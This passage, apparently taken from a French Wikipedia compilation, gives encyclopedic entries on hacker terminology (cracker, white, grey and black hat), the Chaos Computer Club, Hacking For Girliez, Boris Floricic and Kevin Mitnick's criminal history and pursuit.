Hackers dans les œuvres de fictions • Lisbeth Salander : personnage de la trilogie Millénium ; enfermée pendant deux années en institut psychiatrique à partir de ses 12 ans, Lisbeth possède une mémoire eidétique ainsi qu'un don incroyable pour l'informatique. • David Lightman : personnage principal du film Wargames ; dans un climat de guerre froide, il hacke le serveur d'une entreprise pour jouer à un jeu de stratégie, ce jeu est en fait relié à un ordinateur auquel est confié le contrôle des opérations militaires de riposte en cas d'attaque du bloc de l'Est. A son insu il manque de déclencher une guerre. Hacker (sécurité informatique) 353

Publications francophones en sécurité informatique • Pirate informatique, édité par ID Presse ; • MISC, édité par les éditions Diamond ; • Hackademy Magazine ; • Rafale ; • Le Virus informatique ; • Hackerz Magazine ; • Hacker News Magazine ; • Hacking Magazine. Voir aussi les publications traitant de hacking et la catégorie « publication en sécurité de l'information » .

Productions audiovisuelles • Le 15 avril 2011, France 4 diffusait Pirat@ge, un documentaire qui retrace l’histoire d’Internet grâce aux témoignages de ceux qui l’ont construit, les hackers. Y sont présents Andy Müller-Maguhn du Chaos Computer Club, John Drapper alias Captain Crunch, et Daniel Domscheit-Berg d’OpenLeaks, pour n'en citer que quelques-uns[12].

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Hacker_(s%C3%A9curit%C3%A9_informatique)& action=edit

[2] Voir la RFC1392 - Internet Users' Glossary : http:/ / www. ietf. org/ rfc/ rfc1392. txt

[3] Grand Dictionnaire Terminologique (http:/ / gdt. oqlf. gouv. qc. ca/ ficheOqlf. aspx?Id_Fiche=8869567)

[4] Comment devenir un ? (http:/ / members. tripod. com/ alad1/ hacker-howto-fr. htm), par Eric Raymond, consulté le 11 septembre 2008,

traduit de (http:/ / web. archive. org/ web/ 20061219163441/ catb. org/ ~esr/ faqs/ hacker-howto. html)

[5] http:/ / wiki. whatthehack. org/ index. php/ Main_Page

[6] http:/ / www. hacktic. nl/

[7] http:/ / wiki. whatthehack. org/ index. php/ Galactic_Hacker_Party

[8] http:/ / www. hacktic. nl/ magazine/ 2203. htm

[9] http:/ / www. hip97. nl/

[10] « Les hackers célèbres > H.D. Moore (http:/ / www. journaldunet. com/ solutions/ 0701/ 070117-hackers-celebres/ 7. shtml) » Le Journal du Net

[11] D'après 01net (http:/ / www. 01net. com/ editorial/ 532549/ quand-anonymous-hacke-anonymous/ ) :

[12] Pirat@ge par France 4 (http:/ / www. korben. info/ piratge-par-france-4. html), Korben, 23 mars 2011 Cracker (informatique) 354 Cracker (informatique)

Pour les articles homonymes, voir Cracker.

Cet article ne cite pas suffisamment ses sources (mai 2011). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Un cracker est une catégorie de pirate informatique spécialisé dans le cassage des protections dites de sécurité (ex: protection anticopie) des logiciels[2] , notamment des partagiciels (qui nécessitent des clés d'enregistrement).

Usage du terme et synonyme Le terme cracker est proposé sur Usenet vers 1985 pour riposter à l'usage jugé impropre de hacker[3]. Vers 1981-1982, une tentative d'imposer worm dans ce même sens se solda par un échec[3]. En 1993, la Request for comments 1392 (RFC) définit un cracker comme un individu cherchant à accéder à un ordinateur sans en avoir l'autorisation[4]. Cette formulation est maintenue par Gary Scott Malkin dans la RFC 1983[5] (1996). Pour ce dernier hackers et crackers s'opposent, un cracker se limitant à chercher l'intrusion par tous les moyens à sa disposition[4]. En français, l'usage est de traduire "cracker" par "pirate"[6] ou "pirate informatique"[7].

Hackers • Kevin Mitnick : Cracker / Phreaker • Kevin Poulsen : Phreaker • Gary McKinnon : Cracker / Phreaker • John Draper, alias Captain Crunch, Phreaker

Notes et références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Cracker_(informatique)& action=edit [3][3]Cyberlexis, le dictionnaire du jargon informatique, Eric S. Raymond, Masson, Paris, 1997. ISBN 2-225-85529-3. [4][4]Internet Users' Glossary, RFC 1392, Gary Scott Malkin, 1993. [5][5]Internet Users' Glossary, RFC 1983, Gary Scott Malkin, 1996. [6][6]Délégation générale à la langue française et aux langues de France, Ministère de la Culture et de la Communication, 2007. [7][7]Grand dictionnaire terminologique de la langue française, Office québécois de la langue française, 2007.

• (en) Internet Users' Glossary (http:/ / tools. ietf. org/ html/ rfc1392), RFC 1392, Gary Scott Malkin, 1993.

• (en) Internet Users' Glossary (http:/ / tools. ietf. org/ html/ rfc1983), RFC 1983, Gary Scott Malkin, 1996. White hat 355 White hat

Pour les articles homonymes, voir White.

Cet article est incomplet dans son développement ou dans l’expression des concepts et des idées. [1] Son contenu est donc à considérer avec précaution. Améliorez l’article ou discutez-en.

Les hackers (en français ; la traduction littérale est "bidouilleur") spécialistes en sécurité se divisent communément en deux catégories : les black hats (« chapeaux noirs ») et les white hats (« chapeaux blancs »). Pour beaucoup, cette classification est bien trop manichéenne : les gentils sont les chapeaux blancs, tandis que les méchants hackers sont les chapeaux noirs. Or, au-delà de cette vision très étroite, se pose la question de fond de savoir comment classer sans équivoque un individu parmi ces deux catégories. Un hacker étant un « bidouilleur » informatique, les « black hats » comme les « white hats » peuvent être assimilés à des hackers, en ce sens qu'ils bidouillent les systèmes d'information, allant jusqu'à découvrir des vulnérabilités non rendues publiques et jamais exploitées, que l'on qualifie dans le jargon informatique de « zero day » ou « zéro-jour » d'utilisation. Jusqu'à cette étape la différence entre les couleurs de chapeau n'est pas encore faite. Se pose alors la question : cette vulnérabilité doit-elle être rendue publique ? Dans l'absolu, les « white hats » prônent la divulgation totale (en anglais full disclosure) tandis que les « black hats » prônent la restriction de l'information (afin de pouvoir prendre avantage de ces vulnérabilités le plus longtemps possible). Ici, une distinction apparaît entre les « white hats », qui vont généralement rendre la vulnérabilité immédiatement publique (souvent avec le code source d'un programme appelé « exploit » qui montre comment prendre avantage du bogue), et les « grey hats » qui vont généralement donner un délai raisonnable aux compagnies pour régler le problème avant de rendre la vulnérabilité publique, et rarement rendre public le code source permettant d'exploiter la faille de sécurité. Pourquoi le choix de la divulgation totale ? Pour les « white hats », la divulgation totale est la solution au problème. Différentes listes de diffusion originellement conçues pour diffuser des failles, des vulnérabilités, des bugs non encore connus, ont ainsi vu le jour, tel que bugtraq ou full-disclosure. Dans ces lieux, différents individus diffusent de nouveaux bugs ou des bugs non rendus publics, parfois même des codes d'exploitation (appelés « exploits »). Des individus mal intentionnés s'approprient des codes informatiques rendus publics par certains « white hats », dans le but de provoquer des pannes de systèmes, des « mass-root », etc. Ces individus sont qualifiés de « script-kiddies ». Par définition, les « white hats » avertissent également les auteurs lors de la découverte de vulnérabilités par exemple dans un outil ou sur un serveur sensible. Fondamentalement, ils disent agir pour la bonne cause et dans le respect des lois. Néanmoins, depuis que la loi sur l'économie numérique (la LCEN) a été votée en France, le fait de divulguer publiquement sur Internet des vulnérabilités accompagnées de code d'exploitation est interdit[2], tout comme le fait de posséder des outils permettant le hacking. Cette nouvelle loi a provoqué un malaise dans le milieu « white hats ».

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=White_hat& action=edit [2][2]Le fait, sans motif légitime, d'importer, de détenir, d'offrir, de céder ou de mettre à disposition un équipement, un instrument, un programme informatique ou toute donnée conçus ou spécialement adaptés pour commettre une ou plusieurs des infractions prévues par les articles 323-1 à 323-3 est puni des peines prévues respectivement pour l'infraction elle-même ou pour l'infraction la plus sévèrement réprimée Grey hat 356 Grey hat

Cet article est une ébauche concernant la sécurité informatique. Vous pouvez partager vos connaissances en l’améliorant (comment ?) selon les recommandations des projets correspondants.

Pour les articles homonymes, voir Grey. Un grey hat (en français, « chapeau gris »), dans la communauté de la sécurité de l'information, et généralement de l'informatique, est un hacker compétent, qui agit parfois dans un bon esprit, et parfois non. C'est un hybride entre un hacker white hat et un hacker black hat. Il ne hack pas pour gagner quelque chose personnellement et n'a pas d'intention foncièrement mauvaise, mais peut occasionnellement commettre un délit. Un exemple courant est une personne qui accède illégalement à un système informatique sans rien détruire ou endommager (du moins, pas volontairement), et qui ensuite informe les responsables de ce système informatique de l'existence de la faille de sécurité et possiblement émet certaines suggestions pour régler ce problème. Malgré ces bonnes intentions, ceci est tout de même considéré comme un crime dans la plupart des pays. En effet, des personnes ont même déjà été condamnées au niveau criminel pour avoir comblé des trous de sécurité dans un système informatique auquel elles avaient illégalement accédé. C'est notamment le cas de Sony qui a systématiquement attaqué les personnes qui faisaient cela, d'où actuellement une guerre entre le Géant japonais et la communauté Hacker. Entre également dans cette catégorie une personne qui va découvrir une nouvelle faille de sécurité dans un logiciel ou un système informatique (incluant les erreurs de conception d'un protocole ou des équipements tels que les routeurs) et qui va publier cette vulnérabilité en donnant un préavis raisonnable au fabricant et aux utilisateurs pour trouver une solution à l'image de Tavis Ormandy[1],[2]. Un type de hacker grey hat est le hacker agissant au nom d'une idéologie qu'il considère juste, commettant des délits non pas pour son propre profit mais dans le but de lutter pour une cause, telles que la liberté d'expression et la protection de la vie privée pour les hackers grey hat des groupes LulzSec et Anonymous. Cependant, la communauté d'exploit-db peut aussi être considérée comme des grey hat bien qu'éloignée de toute idéologie ou hacktivisme.

Résumé En bref, un grey hat est un hacker qui : •• est engagé pour la sécurité et la recherche de failles d'applications ou de sites web ; •• est régi par une éthique (de diffusion de l'information, ou/et politique) ; •• cherche à protéger l'utilisateur des failles potentielles en prévenant le vendeur ; •• défend les droits de l'utilisateur.

Référence

[1] taviso.decsystem.org (http:/ / taviso. decsystem. org/ ) Son site web

[2] Microsoft colmate la faille mise à jour par l'ingénieur de Google (http:/ / www. developpez. com/ actu/ 18977/

Microsoft-colmate-la-faille-mise-a-jour-par-l-ingenieur-de-Google/ ) L'affaire en question, sur developpez.com

• Portail de la sécurité informatique Black hat 357 Black hat

Cet article ne cite pas suffisamment ses sources (janvier 2010). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Définition populaire Note: Cette vision est populaire et ne reflète pas l'histoire du "hacker". Voir "non-divulgation de failles" Black hat est un terme en argot informatique qui désigne les hackers mal intentionnés, contrairement aux white hats qui sont les hackers aux bonnes intentions. Ces termes font références aux films de western, où le héros ou le shérif portent un chapeau blanc, et les méchants portent des chapeaux noirs. En informatique, le terme hacker désigne quelqu'un capable de trafiquer un système indépendamment de ses intentions. Les deux termes servent donc à différencier les hackers selon leurs bonnes ou mauvaises intentions. Les black hats ont une nette préférence pour les actions illégales. Cela va de la création de virus aux chevaux de Troie en passant par les vers et les logiciels espion. Ces personnes tirent parti de leurs compétences informatiques à dessein d’en tirer un bénéfice financier ou bien dans le but de nuire à des individus ou à des organisations (mais dans ce cas on parle plutôt de Cyber-terroristes). Plus généralement, ils utilisent leur savoir pour découvrir des choses qui leur sont cachées. Leur nombre ne cesse de grandir étant donné la valeur de plus en plus grande des informations dans la guerre économique. Il n’est pas impossible que certains black hats finissent par changer de bord et se fassent employer par des sociétés spécialisées dans la sécurité informatique à l’instar de Sven Jaschan, auteur du virus Sasser, recruté en 2005 par la PME allemande Securepoint. La communauté des black hats est hétérogène : les différents membres ne se reconnaissent pas toujours entre eux, à cause de leurs différences d’opinion, de capacités ou de philosophie.

Autre définition : non-divulgation de failles Une autre définition un peu moins connue de « Black Hat » concerne la non-divulgation de failles ou d’outils de sécurité sensibles (le contraire de la divulgation totale, credo des white hats : la full disclosure). En effet, il y a tout un débat pour savoir si dévoiler une vulnérabilité n’aura pas d’effets négatifs tels qu’un « mass-root » de serveurs effectué par des script kiddies qui utiliseront un exploit sans même le comprendre, au lieu de garder la vulnérabilité pour soi et restreindre sa diffusion (en partant du principe que celui qui découvrira la faille n’est pas un script kiddie mais plutôt une personne responsable qui ne veut pas que sa découverte soit utilisée à des fins malhonnêtes). Black hat 358

Autre définition : Conférences du Black Hat Par ailleurs, dans le monde de la sécurité informatique, le terme Black Hat représente également des conférences, organisées partout dans le monde, sur le thème de la sécurité informatique. Une caractéristique de ces rassemblements est que les présentations sont considérées comme étant très techniques : ils s'adressent ainsi principalement aux experts de la sécurité.

Autre définition : dans le domaine du SEO (Search Engine Optimisation) Le terme est aussi employé dans le domaine du SEO pour décrire le comportement d'un référenceur qui utilise des techniques contraires aux guidelines de Google. Le plus couramment, ce terme décrit des activités faites d'automatisations (générer des sites automatiquement pour obtenir des liens, générer des commentaires de blog incluant des liens, etc..) dans le but de faire du référencement à l'échelle de masse. Toute technique qui ne seraient pas pérenne entraîne néanmoins cette appellation. Aux antipodes, il y a les "White hats", qui respecteraient les guidelines de Google et qui ferait du référencement plus manuel. Les limites sont cependant difficilement identifiables, c'est pourquoi l'utilisation de logiciels et scripts d'automatisation permet bien souvent de révéler la frontière entre les deux.

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Black_hat& action=edit

Chaos Computer Club

Cet article ne cite pas suffisamment ses sources (avril 2011). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Le Chaos Computer Club, que l'on désigne souvent par le sigle CCC, est l'une des organisations de hackers les plus influentes en Europe. Le Club se décrit plus poétiquement en tant que communauté galactique des êtres de la vie, indépendante de l'âge, du sexe, de l'origine ethnique ou de l'orientation sociale, qui œuvre à travers des frontières pour la liberté d'information […]. Aujourd'hui, le Chaos Computer Club est principalement actif dans les pays germanophones. Un Chaos Computer Club France a vu le jour dans les années 1980, mais il ne s'agissait en réalité que d'un faux groupe de hackers monté par Jean-Bernard Condat pour le compte de la DST. Chaos Computer Club 359

Ses buts Le Chaos Computer Club est une communauté globale, qui fait campagne pour la liberté de l'information et de la communication sans aucune censure, quelle qu'elle soit - par n'importe quel gouvernement ou compagnie -, et qui étudie les impacts de la technologie pour la société et l'individu. Ces buts sont également énoncés dans le préambule de la constitution du club, et sont mis en application dans beaucoup de projets par des membres et des amis du CCC.

Ses missions Le CCC se considère comme étant une plateforme de communication pour les Hackers et ceux qui veulent le devenir. De plus, non seulement les possibilités de technologie sont étudiées, mais aussi les risques et les conséquences pour la société. Le CCC diffuse les résultats de ses investigations par l'intermédiaire d'une variété de canaux de médias et aux événements publics, aux réunions et aux discussions politiques.

Son histoire Le CCC a été fondé en 1981 à Berlin - il y avait deux grands groupes : l'un à Berlin, l'autre à Hambourg (CCCH). En 1988, se crée Haecksen (un jeu de mots relatif à Hexen, ce qui signifie Sorcières), une association de femmes issues du CCC.

Évènements réguliers

Depuis 1984, le CCC tient tous les ans un Chaos Communication Congress, qui a lieu habituellement autour de Noël à Berlin. La même année est apparu également pour la première fois le Datenschleuder, le magazine du CCC. En 1999, en 2003, puis en 2007 et en août 2011, ont eu lieu le Chaos Communication Camp, un camp de 60 000 m² en plein air, pour « des rencontres, des discussions, des tests, des mises en pratique, des questionnements, du design et redesign, de l'engineering et rétro-ingénierie, de la recherche, du hacking, du phreaking, et des Tente au Chaos Communication Camp avec le séances de réflexion et de compréhension. » Pesthörnchen

Quelques actions Le CCC est devenu mondialement célèbre quand il a attaqué le Bildschirmtext allemand (système Vidéotex voisin du Minitel) et réussi à pénétrer une banque locale et à détourner 134 000 DM sur son compte bancaire. L'argent fut retourné le lendemain. En 1989, le CCC a été indirectement impliqué dans la première affaire de cyberespionage en faisant les titres de journaux internationaux. Un groupe de hackers ouest-allemands, menés par Karl Koch ont été arrêtés pour avoir piraté des ordinateurs américains au profit du KGB, le service de renseignements soviétique. Chaos Computer Club 360

Personnalités • Boris Floricic dit Tron, hacker, créateur du système Crypton • Wau Holland, co-fondateur • Andy Müller-Maguhn, élu membre du conseil de ICANN pour l'Europe • Jean-Bernard Condat, secrétaire général et fondateur du faux Chaos Computer Club France

Annexes

Bibliographie • Daniel Kulla : Der Phrasenprüfer. Szenen aus dem Leben von Wau Holland, Mitbegründer des Chaos Computer Clubs (Scènes de vie de Wau Holland, cofondateur du CCC), Löhrbach 2003, ISBN 3-922708-25-0

Liens externes • Site officiel du CCC [2] et version SSL [3] • Die Datenschleuder [4] • Radio du CCC [5] • Fondation Wau de Hollande [6] • Haecksen [7]

• Portail de la sécurité informatique • Portail de l’Allemagne

Références

[1] http:/ / fr. wikipedia. org/ w/ index. php?title=Chaos_Computer_Club& action=edit

[2] http:/ / www. ccc. de

[3] https:/ / www. ccc. de

[4] http:/ / ds. ccc. de

[5] http:/ / chaosradio. ccc. de

[6] http:/ / www. wauland. de

[7] http:/ / www. haecksen. org Hacking For Girliez 361 Hacking For Girliez

HFG (Hacking For Girliez) était un groupe de hackers hacktivistes dont la période d'activité se situe en grande partie durant l'année 1998. Il se caractérisait essentiellement par sa discrétion. Personne ou presque ne connaissant l'identité de ses membres et les autorités américaines n'ont jamais réussi à les appréhender. Le groupe est essentiellement connu pour avoir pris le contrôle du site du New York Times le 13 septembre 1998 et en avoir interdit l'accès durant neuf heures. Il a agi le jour où le rapport Starr sur les liaisons de Bill Clinton devait être dévoilé au grand public, donc la fréquentation du site devait être exceptionnelle. Cette action visait le journaliste John Markoff du New York Times. Le groupe l'accusait d'avoir délibérément exagéré la description de Kevin Mitnick dans son article à la une du quotidien paru le 4 juillet 1994 afin d'augmenter la valeur marchande de l'histoire et profiter pleinement de la couverture médiatique de l'évènement pour publier un livre[1] très lucratif et un contrat pour son adaptation cinématographique[2]. Ils ont également « rooté » d'autres sites comme celui de la NASA, le site de l'e-zine underground Phrack, les sites de Motorola É.-U. et Motorola Japon et bien d'autres encore. Le groupe s'est dissout depuis.

Notes

[1] Tsutomu Shimomura et John Markoff, Takedown: The Pursuit and Capture of Kevin Mitnick, America's Most Wanted Computer Outlaw - By the Man Who Did It, 1998 [2] Cybertr@que (Takedown est le titre de la version originale)

Liens externes • (en) Kevin Poulsen, « The attack of the New York Times website takes the Free Kevin Mitnick movement to a

new level » (http:/ / www. techtv. com/ cybercrime/ features/ jump/ 0,23009,2137658,00. html)

• Portail de la sécurité informatique 362

13-Personnalités 363

13.1-Hackers

Boris Floricic

Boris Floricic (8 juin 1972 - octobre 1998 à Berlin) était un hacker allemand d'origine croate, dont le pseudonyme était Tron, en référence au film Tron de Walt Disney mettant en scène des hackers. Tron s'intéressait aux attaques de systèmes de cryptographie et d'authentification commerciales, comme ceux que l'on trouve dans les cartes téléphoniques et les décodeurs des chaînes de télévision à péage. En 1997, il développe une nouvelle technologie cryptographique pour la téléphonie dans le cadre de sa thèse. Son « Cryptophon » utilise cette technologie et son successeur, le « Cryptron », en référence à la kryptonite, était présenté comme un futur produit de masse. Cartes permettant la lecture/écriture de GSM avec La mort subite de Tron empêcha cette évolution. Boris fut retrouvé une technologie élaborée par Tron en 1998 pendu dans un parc à Neukölln, un quartier de Berlin. Plusieurs membres du CCC (Chaos Computer Club) et certains amis de Boris ont contesté la thèse officielle du suicide et invoqué un possible meurtre par un service secret ou le crime organisé inquiet d'une utilisation « occidentale » de ressources qui auraient dû leur revenir. Dans les médias allemands, le nom de famille de Boris ne devait pas être nommé, à la demande de ses parents. Le non-respect de cette règle par la Wikipédia germanophone a conduit le 19 janvier 2006 à la fermeture par décision d'un tribunal d'une redirection du site de l'association Wikimedia Deutschland e.V. vers la page d'accueil du site de la Wikipedia germanophone. Le 9 février 2006, le tribunal allemand de Charlottenburg s'est prononcé sur le fond de l'affaire et a rejeté la demande des plaignants. Selon l'avocat de Wikimedia Allemagne, le rejet de la plainte a été justifié par le fait que la divulgation de l'identité du pirate n'était pas une violation du droit à la vie privée (Persönlichkeitsrecht). La redirection du site de l'association vers le site de la Wikipedia germanophone a pu donc être remise en place dès lors. L'appel des parents a été rejeté au mois de mai 2006. Ils ont annoncé leur souhait de poursuivre éventuellement leur action devant les instances européennes.

Bibliographie • (de) Burkhard Schröder: Tron. Tod eines Hackers. Rowohlt-Taschenbuch-Verlag, Reinbek bei Hamburg 1999, ISBN 3-499-60857-X.

Liens externes • (de) Site sur Boris Floricic [1] • (de) Les dessins techniques du Cryptron/Cryptophon et le memoire de thèse de Boris [2]

• Portail de la sécurité informatique • Portail de la sécurité de l’information Boris Floricic 364

Références

[1] http:/ / www. tronland. net/

[2] ftp:/ / ftp. ccc. de/ cryptron/

Kevin Mitnick

Cet article ne cite pas suffisamment ses sources (mars 2009). Si vous disposez d'ouvrages ou d'articles de référence ou si vous connaissez des sites web de qualité traitant du thème abordé ici, merci de compléter l'article en donnant les références utiles à sa vérifiabilité et en les liant à la section « Notes et références ». (Modifier l'article [1] )

Kevin David Mitnick, né le 6 août 1963 à Van Nuys en Californie, est un pirate informatique. Il se fait appeler Le Condor. Il est célèbre notamment pour avoir accédé illégalement aux bases de données des clients de Pacific Bell, ainsi qu'aux systèmes de Fujitsu, Motorola, Nokia, Sun Microsystems et aussi du Pentagone. Il est le premier hacker à figurer dans la liste des dix criminels les plus recherchés par le FBI aux États-Unis.

Mitnick est aujourd'hui consultant en sécurité informatique et est le De gauche à droite : Adrian Lamo, Kevin cofondateur de la société Defensive Thinking. En 2002, il coécrit un Mitnick, Kevin Poulsen livre traitant de l'ingénierie sociale et basé sur ses expériences personnelles : L'art de la supercherie[2]. Puis, fort du succès de ce premier livre, il en coécrit un autre en 2005 : L'art de l'intrusion [3]. Ce deuxième ouvrage s'intéresse aux intrusions dans des réseaux informatiques, effectuées par des inconnus ou des groupes de hackers célèbres, tel L0pht.

L'histoire

Premiers délits En 1980, il avait pénétré physiquement dans le central téléphonique COSMOS (COmputer System for Mainframe OperationS) de Pacific Bell à Los Angeles avec deux amis. Quand un abonné appelait pour obtenir une information, il tombait sur Mitnick ou sur l'un de ses complices qui demandait « La personne que vous recherchez est-elle blanche ou noire ? Car nous tenons deux répertoires distincts. »[4] COSMOS servait de base de données à la compagnie pour archiver les appels téléphoniques, ainsi que la facturation. Les cracker se procurèrent une liste des mots de passe des utilisateurs, les combinaisons de fermeture des portes de neuf bureaux centraux de Pacific Bell et un manuel du système. Ils ont ensuite détourné des lignes téléphoniques à titre personnel. Un directeur technique a découvert l'anomalie et est remonté jusqu'à une cabine téléphonique d'où provenaient les appels. La police se charge ensuite de l'enquête qui conduit à l'arrestation de Mitnick et de ses comparses. Ils sont accusés de dégradation de données, ainsi que du vol du mode d'emploi de la base de données. Mitnick n'avait que 17 ans à l'époque et le verdict est de trois mois de détention en centre de redressement et une année de mise à l'épreuve. Steven Roads, un ancien ami de Mitnick, confiait à la presse que ce dernier se serait introduit dans le site du North American Air Defense Command à Colorado Springs en 1979, ce que l'intéressé a toujours nié. Ces rumeurs ont été diffusées dans le New York Times par John Markoff, qui a d'ailleurs ajouté la rumeur selon laquelle le film WarGames (1983), où un adolescent manque de déclencher une Troisième Guerre mondiale à cause Kevin Mitnick 365

de ses intrusions dans des réseaux informatiques, avait été inspiré par l'histoire de Kevin Mitnick[5].

Premières condamnations En 1983, Mitnick fait une intrusion dans le réseau du Pentagone. Il s'est servi d'une machine de l'University of Southern California et mis ses compétences à l'épreuve[6]. La police l'interpelle sur le campus de l'université. Il est placé en centre de détention pour jeunes situé à Stockton en Californie durant six mois pour s'être connecté à l'ARPAnet, l'ancêtre d'Internet, et a obtenu un accès illégal mais apprécié à tous les fichiers du département de la Défense américaine. Aucune preuve de vol ou de dégradation de données n'a été apportée à l'époque : Mitnick a simplement assouvi sa curiosité. Il purge sa peine, mais est de nouveau inquiété des années plus tard. Un avis de recherche est émis, car il est soupçonné d'avoir modifié les données sur un ordinateur d'analyse de situation patrimoniale pour l'octroi de crédits d'une société. Mais l'avis disparaît des archives de la police.[réf. nécessaire] En 1987, il est de nouveau arrêté par la police pour utilisation illégale de numéros de cartes de crédits téléphoniques, ainsi que le vol d'un logiciel de la société californienne Santa Cruz Operation. Il est mis à l'épreuve durant trois ans.

Première arrestation par le FBI Mais avec l'aide de son ami Lenny DiCicco, il cherche à s'introduire dans le laboratoire de recherche de Digital Equipment Corporation (DEC) situé à Palo Alto. Son but est d'obtenir le code source du système d'exploitation VMS pour les ordinateurs VAX. Depuis les locaux de la société Calabass, où DiCicco travaille comme informaticien, ils cherchaient à s'introduire dans le réseau intranet de l'entreprise, dénommé Easynet. Les attaques sont repérées rapidement, mais Mitnick brouille la provenance des appels, ce qui empêche de remonter jusqu'à eux. Vexé par un canular de Mitnick (Mitnick avait appelé l'employeur de DiCicco en se faisant passer pour un agent du gouvernement, prétendant que ce dernier était en conflit avec l'IRS, le fisc américain), DiCicco décide de mettre son employeur au parfum de leurs dernières activités et contacte DEC, puis le FBI. DiCicco donne alors rendez-vous à Mitnick sur un parking à la tombée de la nuit. Quand ce dernier se présente, il est arrêté par deux agents du FBI tapis dans l'ombre. DEC accuse Mitnick d'avoir volé des logiciels valant plusieurs millions de dollars, et d'avoir coûté 200 000 dollars de frais pour le rechercher et l'empêcher d'avoir accès à leur réseau. Mitnick plaide uniquement coupable pour fraude informatique et possession illégale de codes d'accès d'appels longue distance. Il doit alors faire un an de prison et suivre un programme de six mois en vue de réduire sa trop grande dépendance à l'informatique.

Nouveau départ En 1989, Mitnick venait de passer huit mois à la prison Metropolitan Detention Center de Los Angeles et quatre mois à Lompoc. Il déménage alors à Las Vegas et travaille comme programmeur dans une agence publicitaire. Trois ans plus tard, il revient dans la Vallée de San Fernando et trouve, sur recommandation d'un ami, un travail de détective à la Tel Tec Detective Agency. Peu de temps après, un usage illégal de systèmes de données commerciales sous le couvert de l'agence est découvert. Le FBI enquête de nouveau sur Mitnick. Quelques mois plus tard, un mandat d'arrêt est émis par un juge fédéral à son encontre. Il est accusé d'avoir enfreint les clauses de sa mise à l'épreuve datant de 1989 et de s'être introduit dans le réseau d'une société de télécommunications. Mais quand des agents du FBI viennent l'arrêter à son domicile, Mitnick a disparu. Kevin Mitnick 366

Fugitif Mitnick a décidé de fuir. Le FBI mettra deux ans à le retrouver. Fin 1992, un individu ayant un code d'identification valide appelle le Department of Motor Vehicles (DMV) de Sacramento et demande à se faire faxer la photo du permis de conduire d'un informateur de la police. Les agents du DMV, soupçonnant une supercherie, cherchent à localiser le numéro de fax envoyé par l'inconnu. Ils découvrent qu'il s'agit d'un magasin de reprographie de Studio City, près de Los Angeles. Mais quand ils arrivent sur place, ils aperçoivent un individu en train d'enjamber le mur du parking qui leur échappe. Ils établiront plus tard qu'il s'agissait de Mitnick. Depuis quelque temps déjà, le FBI soupçonne Mitnick d'avoir pris le contrôle du réseau téléphonique de la Californie et de mettre sur écoute les agents fédéraux chargés de le traquer car il arrive ainsi à anticiper leur mouvement. L'affaire est alors surmédiatisée. La presse californienne brosse le portrait d'un individu extrêmement malicieux et insaisissable qui tourne les autorités en ridicule. Le journaliste du New York Times John Markoff, qui avait rédigé un livre sur Mitnick[7], lui consacre un article à la une de l'édition du 4 juillet 1994, où il affirme que Mitnick peut mettre le chaos dans le réseau informatique mondial. Mitnick a dénié par la suite bon nombre des accusations présentes dans cet article[8].

Tsutomu Shimomura Toujours en fuite et vivant dans la clandestinité, Mitnick s'attaque à un expert en sécurité informatique et ancien hacker : le japonais Tsutomu Shimomura[9]. La technique mise en œuvre par Mitnick pour s'introduire dans la machine de Shimomura était déjà connue à l'époque des faits, mais personne ne l'avait encore mise en pratique, il s'agit de l'IP spoofing. Pour être sûr que personne ne sera connecté à la machine cible, il choisit d'effectuer son attaque le 25 décembre 1994, le jour de Noël. Mitnick exploite une faille dans l'architecture du réseau cible et les points faibles du protocole TCP de l'époque. Il fait croire à l'ordinateur de Shimomura que les messages qu'il lui envoyait venaient d'une source autorisée, une machine de la Loyola University de Chicago en l'occurrence, dont il va se servir comme passerelle pour l'atteindre. Mais Mitnick ne s'est pas rendu compte que le pare-feu était configuré de telle sorte qu'il envoyait une copie des fichiers de logging à un autre ordinateur toutes les heures, ce qui a produit une alerte automatique. Le lendemain, Shimomura s'apprête à partir en vacances, quand il reçoit l'appel d'un de ses collègues du Centre de calcul de San Diego. Ce dernier l'informe qu'il a détecté une intrusion dans l'ordinateur installé dans la maison de vacances de Shimomura, à Del Mar. Une partie des fichiers de logging est effacée. L'intrus s'est approprié des centaines de documents et de logiciels.

Traque Shimomura décide donc d'aider le FBI à arrêter Mitnick. Un mois après l'intrusion, il reçoit un coup de fil d'un usager d'un service commercial d'accès à Internet, la WELL (Whole Earth 'Lectronic Link) de Sausalito. Ce dernier lui raconte qu'il a reçu un courriel de son administrateur réseau lui enjoignant de nettoyer son compte qui dépasse la taille règlementaire. Il découvre alors qu'un inconnu y a déposé des fichiers qui contiennent entre autres des listes de mots de passe et les feuilles de salaires d'un certain Shimomura[10]. Il s'agit en réalité des fichiers dérobés par Mitnick sur la machine située à Del Mar. Shimomura et une petite équipe du Centre de calcul de San Diego s'installent alors à Sausalito. Ils se branchent sur l'intranet de la WELL et mettent en place un système de surveillance à l'intention de Mitnick. Ce dernier a piraté plusieurs comptes de la WELL et s'en sert comme plateforme d'attaque. Ainsi, le 17 janvier 1995, Shimomura et son équipe observent Mitnick infiltrer un pare-feu du réseau de Motorola et s'emparer du logiciel de sécurité. Quelques jours plus tard, l'équipe découvre le vol de 20 000 numéros de cartes de crédits d'usagers de Netcom, un FAI de San José. Ils décident alors de déplacer leur base dans cette ville et surveillent désormais le réseau de Netcom. Les appels Kevin Mitnick 367

de Mitnick proviennent de trois villes différentes : Denver, Minneapolis et Raleigh. L'équipe compare alors les registres d'appels des compagnies téléphoniques utilisées par Mitnick avec ceux de Netcom. Le travail est long, mais ils finissent par se convaincre que l'origine des appels est vraisemblablement Raleigh.

